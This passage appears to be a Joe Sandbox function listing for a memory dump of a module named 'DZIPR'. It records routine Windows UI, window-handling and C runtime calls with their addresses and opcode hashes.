Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ErrorModule__wcsdup$FileModeName$AddressExtensionFindHandleLastPathProc
String ID: NotifyWinEvent$user32.dll
API String ID: 3531328582-597752486
Opcode ID: 557d859eb9afb50005227ac7e204b4a02b03694781892fecf38e98ec48a00e86
Instruction ID: d249c2250cb1e641a633dcf4fbf48fd112816cdb3db80c69254b7ab3b899498f
Opcode Fuzzy Hash: 557d859eb9afb50005227ac7e204b4a02b03694781892fecf38e98ec48a00e86
Instruction Fuzzy Hash: FB01B1706543148FCB10EF689904A5E3FD8AF45B18B25809EB955DF281DB32D840CF62

Function 6FEACD20 Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 6FEACD2E
GetSysColor.USER32(00000010), ref: 6FEACD35
GetSysColor.USER32(00000014), ref: 6FEACD3C
GetSysColor.USER32(00000012), ref: 6FEACD43
GetSysColor.USER32(00000006), ref: 6FEACD4A
GetSysColorBrush.USER32(0000000F), ref: 6FEACD57
GetSysColorBrush.USER32(00000006), ref: 6FEACD5E

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 270117930192d15761f40ec4f1739e1d6983b166af64d02eb61b505c0ff77e4b
Instruction ID: 64dd7aae0c6e985964cc8c9d4b2cc2173e0b91e28a1d103724191b11f0608cae
Opcode Fuzzy Hash: 270117930192d15761f40ec4f1739e1d6983b166af64d02eb61b505c0ff77e4b
Instruction Fuzzy Hash: 3BF0FE719407445BDB30BB764909B47BED1FFC5720F16192EE2858B990D6B6E441DF40

Function 6FEA815A Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6FEA818D
GetParent.USER32(?), ref: 6FEA819B
GetParent.USER32(?), ref: 6FEA81AE
GetLastActivePopup.USER32(?), ref: 6FEA81BF
IsWindowEnabled.USER32(?), ref: 6FEA81D3
EnableWindow.USER32(?,00000000), ref: 6FEA81E6

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 8d8a29e5d6da18b2e53175b172ceaf65c92fd54c499112f9eba8babc55d4e7fc
Instruction ID: a7509d2bae3cf696bfc85b3210732f30267b5e1ea04c19ab15253ade9be07526
Opcode Fuzzy Hash: 8d8a29e5d6da18b2e53175b172ceaf65c92fd54c499112f9eba8babc55d4e7fc
Instruction Fuzzy Hash: 8711C83260D6B06BD7131A698D40B9A7FA86F66B68F250267FC10DF340C762EF01C6D1

Function 6FEBC416 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 6FEBC43E

Part of subcall function 6FEB4FC4: __getptd.LIBCMT ref: 6FEB4FD2
Part of subcall function 6FEB4FC4: __getptd.LIBCMT ref: 6FEB4FE0

__getptd.LIBCMT ref: 6FEBC448

Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F

__getptd.LIBCMT ref: 6FEBC456
__getptd.LIBCMT ref: 6FEBC464
__getptd.LIBCMT ref: 6FEBC46F
_CallCatchBlock2.LIBCMT ref: 6FEBC495

Part of subcall function 6FEB5069: __CallSettingFrame@12.LIBCMT ref: 6FEB50B5

Part of subcall function 6FEBC53C: __getptd.LIBCMT ref: 6FEBC54B
Part of subcall function 6FEBC53C: __getptd.LIBCMT ref: 6FEBC559

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 0ab9d3d2cdcb5575018adb5125a0c7f71047ada09d40741a01e7fc22c361a0f4
Instruction ID: bff48455450713963a29a2c1bd7370caaf8157e25165e6885316c8bd5f79086c
Opcode Fuzzy Hash: 0ab9d3d2cdcb5575018adb5125a0c7f71047ada09d40741a01e7fc22c361a0f4
Instruction Fuzzy Hash: C311C3B1D44309DFDF00DFA8CA44AAD7BB1FF58319F24816EE814A7290EB399A159F50

Function 6FEADB5C Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6FEADB6D
GetDlgCtrlID.USER32(00000000), ref: 6FEADB81
GetWindowLongW.USER32(00000000,000000F0), ref: 6FEADB91
GetWindowRect.USER32(00000000,?), ref: 6FEADBA3
PtInRect.USER32(?,?,?), ref: 6FEADBB3
GetWindow.USER32(?,00000005), ref: 6FEADBC0

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: ac37bac2ff37b91351a4aa66f595ebb43832ed475b7b19cd36479814e06d92e1
Instruction ID: 3aa63d41e3a8bde4599a35eb142eb56b27c43a81cbc5bfcf19ec2fcdd7c273a0
Opcode Fuzzy Hash: ac37bac2ff37b91351a4aa66f595ebb43832ed475b7b19cd36479814e06d92e1
Instruction Fuzzy Hash: 33018B3A104419ABCB215F688D08EAE3F6AEF87760F144161FD219A180D735E6228B94

Function 6FEA96DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6FEA96F2
_memset.LIBCMT ref: 6FEA976A
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FEA97CD
LoadBitmapW.USER32(00000000,00007FE3), ref: 6FEA97E5

Strings

, xrefs: 6FEA974B

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: ddd5341e6028c5f3e04120d92a428180f1b27389f20d632ba7deb5716d2a1002
Instruction ID: 51b8a1e905f0999393d1c7493ff7bfa819f3bcb7dff992e363ef08454782e40e
Opcode Fuzzy Hash: ddd5341e6028c5f3e04120d92a428180f1b27389f20d632ba7deb5716d2a1002
Instruction Fuzzy Hash: 79312471A003289FEB108F688DC5B9D7FB4FB45354F6540BAF549DB2C0DB329A858B60

Function 6FEB140F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6FEAC220: RtlEnterCriticalSection.NTDLL(6FED34A8), ref: 6FEAC25A
Part of subcall function 6FEAC220: RtlInitializeCriticalSection.NTDLL(?), ref: 6FEAC26C
Part of subcall function 6FEAC220: RtlLeaveCriticalSection.NTDLL(6FED34A8), ref: 6FEAC279
Part of subcall function 6FEAC220: RtlEnterCriticalSection.NTDLL(?), ref: 6FEAC289

Part of subcall function 6FEABB0C: __EH_prolog3_catch.LIBCMT ref: 6FEABB13

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6FEB1458
FreeLibrary.KERNEL32(?), ref: 6FEB1468

Strings

HtmlHelpW, xrefs: 6FEB1452
hhctrl.ocx, xrefs: 6FEB143C
(Qo, xrefs: 6FEB1421

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: (Qo$HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3778432635
Opcode ID: d178384706129c545c0a003830d19adee92693d0102d5c9d9b55d713aa362ea9
Instruction ID: 42d0adc15290e6d45b286fa58fbd447aa2b269019aaa0796f28755791dfbdb93
Opcode Fuzzy Hash: d178384706129c545c0a003830d19adee92693d0102d5c9d9b55d713aa362ea9
Instruction Fuzzy Hash: B301AD31504B06ABCB215FA9CF04B4B3FA4AF01368F20C92DF9AA9A190DB35E4108A12

Function 6FEBC165 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6FEBC17F

Part of subcall function 6FEBA27F: __getptd_noexit.LIBCMT ref: 6FEBA282
Part of subcall function 6FEBA27F: __amsg_exit.LIBCMT ref: 6FEBA28F

__getptd.LIBCMT ref: 6FEBC190
__getptd.LIBCMT ref: 6FEBC19E

Strings

csm, xrefs: 6FEBC178
MOC, xrefs: 6FEBC171

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$csm
API String ID: 803148776-1389381023
Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction ID: d267659146bda2766ba9cbd9eb4a1fe47d6d0e5057d2b14fe039c330c5390536
Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
Instruction Fuzzy Hash: F7E04F357582048FDB009BB8C245B683FA4EBA9718F3501AEE91CCB361D735E944DA82

Function 6FEA5670 Relevance: 7.6, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,6FEA49D6,?,00000003), ref: 6FEA5685
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FEA56B4
GetLastError.KERNEL32 ref: 6FEA56C5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FEA56E5
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FEA5709

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: a9a368b88e21cbdded1a4aa15bbad752045301fa32a37d84aea632532b984f20
Instruction ID: 85edba09edb9873a445454c686d0cb21424fd81a25f4645df3155bc56a693576
Opcode Fuzzy Hash: a9a368b88e21cbdded1a4aa15bbad752045301fa32a37d84aea632532b984f20
Instruction Fuzzy Hash: 8D118175384705ABE6249F68DCC5F677BACEBC5754F200929F682AB3C0D671BC098670

Function 6FEADA11 Relevance: 7.6, APIs: 5, Instructions: 55stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?), ref: 6FEADA3D
_memset.LIBCMT ref: 6FEADA5B
GetWindowTextW.USER32(00000000,?,00000100), ref: 6FEADA75
lstrcmpW.KERNEL32(?,?,?,?), ref: 6FEADA87
SetWindowTextW.USER32(00000000,?), ref: 6FEADA93

Part of subcall function 6FEA6DC1: __CxxThrowException@8.LIBCMT ref: 6FEA6DD7
Part of subcall function 6FEA6DC1: __EH_prolog3.LIBCMT ref: 6FEA6DE4

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: e6c68f282fa2fa638d57593103eaaa73d0d35dd1ebf9664909e13a31c00bf0aa
Instruction ID: a03ef25e9e4d94bfaf17e53f3587902cdb2d22c670eae7f848e1ce3e4f8819a5
Opcode Fuzzy Hash: e6c68f282fa2fa638d57593103eaaa73d0d35dd1ebf9664909e13a31c00bf0aa
Instruction Fuzzy Hash: EA01C4BA5053196BCB10EBB4CD889DF7BADEF46354F104066F915D7241EA34DA0487A0

Function 6FEB4618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 6FEB4636

Part of subcall function 6FEBA914: __mtinitlocknum.LIBCMT ref: 6FEBA92A
Part of subcall function 6FEBA914: __amsg_exit.LIBCMT ref: 6FEBA936
Part of subcall function 6FEBA914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6FEBA93E

___sbh_find_block.LIBCMT ref: 6FEB4641
___sbh_free_block.LIBCMT ref: 6FEB4650
HeapFree.KERNEL32(00000000,00000000,6FECE828,0000000C,6FEBA270,00000000,?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C), ref: 6FEB4680
GetLastError.KERNEL32(?,6FEBA5D4,00000000,00000001,00000000,?,6FEBA89E,00000018,6FECE978,0000000C,6FEBA92F,00000000,00000000,?,6FEBA32A,0000000D), ref: 6FEB4691

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 0533317e52f8e375d11cd7a77037f1ea99c7becdf5a7b8f526b03a3abde3481e
Instruction ID: f46a27691a460380231bb99d8780196ec94d766d71d42c9a9fe3c088a2ab86ab
Opcode Fuzzy Hash: 0533317e52f8e375d11cd7a77037f1ea99c7becdf5a7b8f526b03a3abde3481e
Instruction Fuzzy Hash: 0001D631805B16AAEF205F74EF0875E3FA4AF02729F70011EE510AA2D8CF38A640CB94

Function 6FEAC113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6FEAC179), ref: 6FEAC13B
GlobalHandle.KERNEL32(?), ref: 6FEAC149
GlobalUnlock.KERNEL32(00000000), ref: 6FEAC152
GlobalFree.KERNEL32(00000000), ref: 6FEAC159
RtlDeleteCriticalSection.NTDLL ref: 6FEAC163

Part of subcall function 6FEABF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6FEABFBC
Part of subcall function 6FEABF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6FEABFCC
Part of subcall function 6FEABF5D: LocalFree.KERNEL32(?), ref: 6FEABFD5
Part of subcall function 6FEABF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6FEABFE7

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 0907fdb8ba640f1cb973a4d52004ad7aafa7c8776ceaa22b81af94c1bf17caa9
Instruction ID: 0e5e36bc4be87f191ebb9ebaa47870682a7d0ca604bdfb32cf64380112afebe5
Opcode Fuzzy Hash: 0907fdb8ba640f1cb973a4d52004ad7aafa7c8776ceaa22b81af94c1bf17caa9
Instruction Fuzzy Hash: 3BF09A36304A109BCA115B3C9D0CE5B3FB8AFC6A64326026AF425CB380CB31E81287A0

Function 6FEBFA07 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 6FEBFA29
__calloc_crt.LIBCMT ref: 6FEBFA42

Strings

$o, xrefs: 6FEBFA6E
}o, xrefs: 6FEBFA59

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: __calloc_crt
String ID: $o$ }o
API String ID: 3494438863-763987776
Opcode ID: a79d228613ee8ac161fdfdcdd076d46247d6a2c96be628d61749c00f5fc6f0de
Instruction ID: fbe25e8be62af33d86388ad1cd23e03e15174a295e47198fb30da3090b6dfe6f
Opcode Fuzzy Hash: a79d228613ee8ac161fdfdcdd076d46247d6a2c96be628d61749c00f5fc6f0de
Instruction Fuzzy Hash: EA11E336748A515BE71C8AADBE807513F99AF87738B34122FF510CE7C0E738E8824284

Function 6FEBC7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6FEBC7D6

Part of subcall function 6FEBC731: ___BuildCatchObjectHelper.LIBCMT ref: 6FEBC767

_UnwindNestedFrames.LIBCMT ref: 6FEBC7ED
___FrameUnwindToState.LIBCMT ref: 6FEBC7FB

Strings

csm, xrefs: 6FEBC7D2, 6FEBC7E7, 6FEBC7FA, 6FEBC818, 6FEBC828

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: eb0aa0b5b8e126f2fe0ea9b31bd53ff615ef53dd1a32ba7fe89fffe94240fe41
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: 6701FB7110521ABBDF125F65CE44EEA7F6AFF08358F204019FD1865160D732E571DBA1

Function 6FEBED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6FEB77D7), ref: 6FEBED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6FEBED8C

Strings

IsProcessorFeaturePresent, xrefs: 6FEBED86
KERNEL32, xrefs: 6FEBED77

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: df0b6a0e8ce68557e958c2e45053ebbd5815c2ea06959a682612701fe9ed237e
Instruction ID: 2cf3345c58a10ca14dd3dc3fa705c454401c700478ec9985f3ff4d3f7e3c363a
Opcode Fuzzy Hash: df0b6a0e8ce68557e958c2e45053ebbd5815c2ea06959a682612701fe9ed237e
Instruction Fuzzy Hash: 2CF01D34A40E09D2DF001FB1AE196AF7E79BB82B56F9209D5E1A5A1184DE7090B1D346

Function 6FEC053C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

___addlocaleref.LIBCMT ref: 6FEC054E

Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(00000000), ref: 6FEC0426
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0433
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0440
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC044D
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC045A
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0476
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC0486
Part of subcall function 6FEC0414: InterlockedIncrement.KERNEL32(?), ref: 6FEC049C

___removelocaleref.LIBCMT ref: 6FEC0559

Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(00000000), ref: 6FEC04BD
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04CA
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04D7
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04E4
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC04F1
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC050D
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC051D
Part of subcall function 6FEC04A3: InterlockedDecrement.KERNEL32(?), ref: 6FEC0533

___freetlocinfo.LIBCMT ref: 6FEC056D

Part of subcall function 6FEC02CB: ___free_lconv_mon.LIBCMT ref: 6FEC0311
Part of subcall function 6FEC02CB: ___free_lconv_num.LIBCMT ref: 6FEC0332
Part of subcall function 6FEC02CB: ___free_lc_time.LIBCMT ref: 6FEC03B7

Strings

P)o, xrefs: 6FEC0564

Memory Dump Source

Source File: 00000013.00000002.1630780399.000000006FEA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FEA0000, based on PE: true

Associated: 00000013.00000002.1630763992.000000006FEA0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.1630912456.000000006FED5000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6fea0000_DZIPR.jbxd

Similarity

API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
String ID: P)o
API String ID: 467427115-3185942622
Opcode ID: 15abfec1d302db2c2af96b2de4cdc7c349ecf40d34c120f803efaaf21b12e8d6
Instruction ID: 28c5d4476bff0da0ac0b1f4bf2ba8539385ab454190bc082f5a3cedf2211726e
Opcode Fuzzy Hash: 15abfec1d302db2c2af96b2de4cdc7c349ecf40d34c120f803efaaf21b12e8d6
Instruction Fuzzy Hash: D3E048F2915921478B37192C76102EA5E547FC1639B31215BF670E7294DB249AC26097

Function 6FEA7D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6FEA7D88
